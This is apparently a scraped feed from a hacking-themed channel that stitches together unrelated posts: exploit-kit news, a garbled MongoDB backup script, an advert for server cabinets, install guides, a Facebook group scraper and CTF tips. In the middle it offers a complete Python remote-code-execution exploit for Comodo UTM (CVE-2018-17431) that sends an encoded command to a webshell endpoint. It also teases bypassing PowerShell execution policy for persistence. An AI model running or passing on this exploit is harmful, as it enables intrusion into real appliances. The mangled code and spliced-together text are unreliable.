▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Neptune exploit how it works ?
kit distributes Monero miner

Cybercriminals use the Neptune exploit kit in a malicious miner distribution campaign. This is reported by experts from the firm FireEye. Neptune, also known as Terror, Blaze, and Eris, was originally thought to be a variant of the Sundown exploit kit due to its similarity in code. With the disappearance of kits such as Angler and Neutrino, Sundown also declined in activity, giving way to RIG.

However, Neptune has gained popularity and is still used in malicious advertising campaigns, in particular those aimed at distributing cryptocurrency miners. FireEye recently discovered several changes in Neptune attacks, including URI patterns, landing pages, and malicious payload.

Attackers use a legitimate pop-up ad service to spread malware. Cybercriminals also disguise their sites by changing the top-level domain from .com to .club (for example, highspirittreks.com and highspirittreks.club). One such malicious site also mimics the YouTube video to MP3 converter.

Typically, malicious ads for this campaign are found on popular torrent sites. When a user enters one of these sites, an attempt is made to exploit three vulnerabilities in Internet Explorer and two in Adobe Flash Player. It is noteworthy that none of the exploited vulnerabilities are new, they were all disclosed back in 2014-2016.


@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🐧 Shell script for backing up MongoDB database :

1) MongoDB is a cross-platform, document-oriented NoSql database server.

2) In this tutorial, you will find a wrapper script for backing up a MongoDB database.

3) The script also deletes server backups older than the specified day.
You can copy this script:
! / bin / bash


################################################# #####################

##

## MongoDB Database Backup Script

## Written By: Rahul Kumar

## Update on: June 20, 2020

##

################################################# #####################

export PATH = / bin : / usr / bin : / usr / local / bin

TODAY = date + "% d% b% Y "


################################################# #####################

################################################# #####################

DB_BACKUP_PATH = '/ backup / mongo'

MONGO_HOST = 'localhost'

MONGO_PORT = '27017'


# If mongodb is protected with username password.

# Set AUTH_ENABLED to 1

# and add MONGO_USER and MONGO_PASSWD values ​​correctly

AUTH_ENABLED = 0

MONGO_USER = ''

MONGO_PASSWD = ''

# Set DATABASE_NAMES to "ALL" to backup all databases.

# or specify databases names seprated with space to backup

# specific databases only.

DATABASE_NAMES = 'ALL'

# DATABASE_NAMES = 'mydb db2 newdb'

## Number of days to keep local backup copy

BACKUP_RETAIN_DAYS = 30

################################################# #####################

################################################# #####################

mkdir - p $ { DB_BACKUP_PATH } / $ { TODAY }

AUTH_PARAM = ""

if [ $ { AUTH_ENABLED } - eq 1 ] ; then

AUTH_PARAM = "--username $ {MONGO_USER} --password $ {MONGO_PASSWD}"

fi

if [ $ { DATABASE_NAMES } = "ALL" ] ; then

echo "You have choose to backup all databases"

mongodump - host $ { MONGO_HOST } - port $ { MONGO_PORT } $ { AUTH_PARAM } - out $ { DB_BACKUP_PATH } / $ { TODAY } /

else

echo "Running backup for selected databases"

for DB_NAME in $ { DATABASE_NAMES }

do

mongodump - host $ { MONGO_HOST } - port $ { MONGO_PORT } - db $ { DB_NAME } $ { AUTH_PARAM } - out $ { DB_BACKUP_PATH } / $ { TODAY } /

done

fi

######## Remove backups older than {BACKUP_RETAIN_DAYS} days ########

DBDELDATE = date + "% d% b% Y " - date = " $ {BACKUP_RETAIN_DAYS} days ago "


if [ ! - z $ { DB_BACKUP_PATH } ] ; then

cd $ { DB_BACKUP_PATH }

if [ ! - z $ { DBDELDATE } ] && [ - d $ { DBDELDATE } ] ; then

rm - rf $ { DBDELDATE }

fi

fi


######################### End of script ###################### ########

4) MongoDB backup schedule
You can easily schedule this script in crontab for regular database backups.

0 2 * * * / backup / mongo - backup .sh

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Mind valley
Unlocking Transcendence withJeffrey Allen

https://drive.google.com/folderview?id=1l2usYpm0ajOXZamHi7IJ3ZCAgleuCsKa

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🗄WTLAN | Five Key Considerations When Choosing Floor Standing Server Cabinets :

1) Server cabinet cooling systems
The choice of server cabinet will depend on the cooling system implemented in your data center and server room.

Hot Aisle Containment (HAC) and Cold Aisle Containment (CAC) systems are highly efficient air control processes that optimize the use of cold air by improving the flow of chilled air through aisles and server enclosures.
In connection with the increase in the cost of electricity energy planning it is also an important factor to be taken into account, because such action may include reducing the amount of used by the PDU, rack selection with improved cabling and space for ventilation.
Follow the link to view the solutions from WTLAN - https://wtlan.ru/catalog/Napolnyeshkafy/

2) Power management
Power distribution units (PDUs) and battery backup are also important factors to consider when choosing a server cabinet and the number of outlets required.

Remote power tools such as smart power strips can help reduce server downtime, and reboot problems can be resolved from a remote location via internet access, whereas standard power strips can provide vital information and must be locally controlled.

3) Server cabinet size
Server cabinets and internal racks are available in a wide range of sizes up to 48U, 19 '' and ETSI standard, in a wide range of widths from 600 mm, 800 mm and 1000 mm, in a wide range of depths from 600 mm, 800 mm, 900 mm, 1000 mm and 1200 mm.

Key features and benefits may include: - modular design, factory assembled, bay design (using a docking kit), hybrid design, thermal efficiency, hot and cold aisle isolation, robust locking solutions, a range of cable and accessory options.

4) Security
Companies are constantly looking for ways to improve their security solutions, as security and protection are very important for a growing number of businesses to protect against vandalism.

Floor-standing server cabinets can provide the following security options: - fire protection, highly reliable locking solutions

Additional measures include lockable front and rear doors, limiting the number of windows in a building and ensuring safe entrances and exits, and installing video surveillance for additional security measures.

5) Server cabinet design
Selecting the right server cabinets and racks and installing them according to your business needs will keep your IT equipment running reliably and efficiently and help improve power protection, cabling, and physical security.

When designing a server cabinet, consider: - the height of the internal cabinet, width, depth, and rated load, cabinet layout, room characteristics, electrical equipment placement, cabling and environmental protection.

You can also choose from several cabinet options and accessories, including: - cable trunking kit, chassis rail kit, shelves, top and side panels, mounting rails, heavy duty wheel kit, and paint color.

don't clone those written tutorials,or
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

New Categories & Speed improuvement added to Undercodenews.com

New technique, how to scientifically identify fake photos with "no PS traces"?
#Updates
_

Detailed fresh Proxies List

https://pastebin.com/9BfWcBUV

BE AWARE FROM NEW CVE IN Mida Framework 2.9.0
#Vulnerabilities
_

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🐉 How to Install Atom Text Editor on Kali Linux 2020.x ?

Key features of the Atom text editor

-Cross-platform editing: works on Windows, Linux and macOS

-Has a built-in package manager: easily find and install packages to extend Atom capabilities.

-Smart AutoComplete: Write and edit code faster with smart and flexible autocomplete.

-File System Browser: Easily view and open a single file, an entire project, or multiple projects in one window.

--Highly Customizable: Customize the look and feel of your user interface with CSS / Less and add basic functionality with HTML and JavaScript.

-Provides Multiple Panels: Split the Atom interface into multiple panels for comparing and editing code between files

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

Installing Atom Text Editor on Kali Linux
Add the official Atom package repository to your system by running the following command.

1) sudo apt update

2) sudo apt -y install wget gpg

3) sudo sh -c 'echo "deb [arch=amd64] https://packagecloud.io/AtomEditor/atom/any/ any main" > /etc/apt/sources.list.d/atom.list'

4) The repository content will be stored in a file:

$ cat /etc/apt/sources.list.d/atom.list
deb [arch=amd64] https://packagecloud.io/AtomEditor/atom/any/ any main

5) Import the GPG key:
wget -qO - https://packagecloud.io/AtomEditor/atom/gpgkey | sudo apt-key add -

6) Then update apt and install the Atom text editor on your Kali Linux machine:

sudo apt update
sudo apt install atom

7) Accept the installation prompt with the y key:


@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Baidu veteran Shi Youcai was taken away by the police
#international
_

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 update dump informations from any facebook group :


🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) https://github.com/kevinzg/facebook-scraper

2) cd facebook-scraper

3) pip install facebook-scraper

4) Send the unique page name as the first parameter and you're good to go:

>>> from facebook_scraper import get_posts

>>> for post in get_posts('nintendo', pages=1):
... print(post['text'][:50])
...

5) The final step on the road to the Super Smash Bros
We’re headed to PAX East 3/28-3/31 with new games
CLI usage

$ facebook-scraper --filename nintendo_page_posts.csv --pages 1 nintendo
Use

$ facebook-scraper --help

Optional parameters

group: group id, to scrape groups instead of pages. Default is None.

pages: how many pages of posts to request, usually the first page has 2 posts and the rest 4. Default is 10.

timeout: how many seconds to wait before timing out. Default is 5.

sleep: how many seconds to sleep between each request. Default is 0.

credentials: tuple of user and password to login before requesting the posts. Default is None.

extra_info: bool, if true the function will try to do an extra request to get the post reactions. Default is False.

youtube_dl: bool, use Youtube-DL for (high-quality) video extraction. You need to have youtube-dl installed on your environment. Default is False.

🦑Post example
{'post_id': '2257188721032235',
'text': 'Don’t let this diminutive version of the Hero of Time fool you, '
'Young Link is just as heroic as his fully grown version! Young Link '
'joins the Super Smash Bros. series of amiibo figures!',
'time': datetime.datetime(2019, 4, 29, 12, 0, 1),
'image': 'https://scontent.flim16-1.fna.fbcdn.net'
'/v/t1.0-0/cp0/e15/q65/p320x320'
'/58680860_2257182054366235_1985558733786185728_n.jpg'
'?_nc_cat=1&_nc_ht=scontent.flim16-1.fna'
'&oh=31b0ba32ec7886e95a5478c479ba1d38&oe=5D6CDEE4',
'likes': 2036,
'comments': 214,
'shares': 0,
'reactions': {'like': 135, 'love': 64, 'haha': 10, 'wow': 4, 'anger': 1}, # if extra_info was set
'post_url': 'https://m.facebook.com/story.php'
'?story_fbid=2257188721032235&id=119240841493711',
'link': 'https://bit.ly/something'}

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑THIS IS THE LASTEST COMODO EXPLOIT :
(patched now)

# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
=# Exploit Author: Milad Fadavvi
# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
# Vendor Homepage: https://www.comodo.com/
# Version: Releases before 2.7.0 & 1.5.0
# Tested on: Windows=Firefox/chrome - Kali=firefox
# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
# CVE : CVE-2018-17431
# CVE-detailes: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
# CVSS 3 score: 9.8

import requests

def RndInt(Lenght):
from random import choice
from string import digits

RandonInt = ''.join([choice(digits) for n in range(Lenght)])
return str(RandonInt)

if name == "main":

IP = input("IP: ")
Port = input("Port: ")

Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH
'''For more info about command try to read manual of spesefic version of Comodo UTM and
exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC)
'''

BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) +"&h=" + RndInt(2)
BaseNComdURL = BaseURL + "&k=" + Command
LastPart = "&l=" + RndInt(2) +"&_=" + RndInt(13)
FullURL = BaseNComdURL + LastPart
AddetionalEnter = BaseURL + "&k=%0a" + LastPart

try:
FirstResponse = requests.get(FullURL).text
except:
print('\nExploit failed due HTTP Error. Check given URL and Port!\n')
exit(1)

SecondResponse = requests.get(AddetionalEnter).text
if SecondResponse.find("Configuration has been altered") == -1:
print("\nExploit Failed!\n")
exit(1)
else:
print("\nOK! Command Ran!\n")
exit(0)

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What is Capture the Flag - CTF ?
#FastTips

-CTF’s (capture the flag) are computer security/hacking competitions which generally consist of participants breaking, investigating, reverse engineering and doing anything they can to reach the end goal, a “flag” which is usually found as a string of text.


-DEF CON hosts what is the most widely known and first major CTF, occuring annualy at the hacking conference in Las Vegas. Many different competitions have branched off since then, and numerous ones are available year round. One of the best places to see when CTFs are being scheduled is ctftime, an active website with calendars and team rankings.

wiki source
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Finding a CTF :

If you ever wanted to start running, you were probably encouraged to sign up to a 5k to keep focused on a goal. The same principle applies here: pick a CTF in the near future that you want to compete in and come up with a practice schedule. Here are some CTFs that we can recommend:


1) PicoCTF and PlaidCTF by CMU

2) HSCTF is made for high school students

3) Ghost in the Shellcode (GitS)

4) CSAW CTF by NYU-Poly

5) UCSB iCTF is for academics only

6) Defcon CTF

#fastTips
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

According to Microsoft, the execution policy is part of the security strategy of PowerShell. It determines whether you can load conguration les (including your PowerShell prole) and run scripts, and it determines which scripts, if any, must be digitally signed before they will run. It should be noted that Microsoft has gone on record saying that the ExecutionPolicy was never intended to be a security control.
In order to change the PowerShell Execution Policy you have to start PowerShell as an administrator and run the following command Set-ExecutionPolicy ExecutionPolicy RemoteSigned. You can also set the RemoteSigned to unrestricted, but it is discouraged by Microsoft.
Alright, but what if you are not an administrator yet? You have basic low privilege access to a Windows machine, and you need to upgrade your shell to something more stable, or to add some Empire persistence. How can you change the ExecutionPolicy?

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🖧 How to install and connect OpenVPN client on Debian-kali 2020-parrot ?

1) Installing the OpenVPN Client
OpenVPN packages are available in the default Debian repositories.

2) Open a terminal on your Debian system and update the apt cache.

3) After that, install the OpenVPN package.

4) Open a terminal and run the commands to install the openvpn client on Debian:

sudo apt update

sudo apt install openvpn -y

5) Connect to OpenVPN Server
Copy the openvpn client config file to your Debian machine.

6) You can use the –config command line parameter to provide a configuration file.

7) The command will read all the necessary data to create a vpn from this file.

8) Let's run the following command to connect to the openvpn server:

openvpn --config client.ovpn
You should see the following output:

9) Thu Sep 10 12:04:18 2020 TCP / UDP: Preserving recently used remote address: [AF_INET] 69.87.218.145:1194
Thu Sep 10 12:04:18 2020 Socket Buffers: R = [212992-> 212992] S = [212992-> 212992]
Thu Sep 10 12:04:18 2020 UDP link local: (not bound)
Thu Sep 10 12:04:18 2020 UDP link remote: [AF_INET] 69.87.218.145:1194

Thu Sep 10 12:04:18 2020 TLS: Initial packet from [AF_INET] 69.87.218.145:1194, sid = 6d27e1cb 524bd8cd
Thu Sep 10 12:04:18 2020 VERIFY OK: depth = 1, CN = Easy-RSA CA
Thu Sep 10 12:04:18 2020 VERIFY OK: depth = 0, CN = tecadmin-server
Thu Sep 10 12:04:18 2020 Control Channel: TLSv1.3, cipher TLSv1.3 TLS_AES_256_GCM_SHA384, 2048 bit RSA
Thu Sep 10 12:04:18 2020 [tecadmin-server] Peer Connection Initiated with [AF_INET] 69.87.218.145:1194
Thu Sep 10 12:04:19 2020 SENT CONTROL [tecadmin-server]: 'PUSH_REQUEST' (status = 1)
Thu Sep 10 12:04:19 2020 PUSH: Received control message: 'PUSH_REPLY, redirect-gateway def1, dhcp-option DNS 208.67.222.222, dhcp-option DNS 208.67.220.220, route 10.8.0.1, topology net30, ping 20, ping-restart 60, ifconfig 10.8.0.6 10.8.0.5, peer-id 0, cipher AES-256-GCM '
Thu Sep 10 12:04:19 2020 OPTIONS IMPORT: timers and / or timeouts modified
Thu Sep 10 12:04:19 2020 OPTIONS IMPORT: --ifconfig / up options modified
Thu Sep 10 12:04:19 2020 OPTIONS IMPORT: route options modified

10) Check the connection
After a successful connection, a new IP address will be assigned on the tun0 interface by the OpenVPN server.

11) You can check it with the following command:

ip a show tun0

🦑Output:

4: tun0: mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 100
    link / none 
    inet 10.8.0.6 peer 10.8.0.5/32 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 fe80 :: 7226: 57b1: f101: 313b / 64 scope link stable-privacy 
       valid_lft forever preferred_lft forever
You can also check the OpenVPN server log to check the connection status:

12) the log file

tail -f /var/log/openvpn.log


@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

18TB hard drive spring is here, Western Red Disk and Purple Disk are upgraded at the same time
#Technologies
_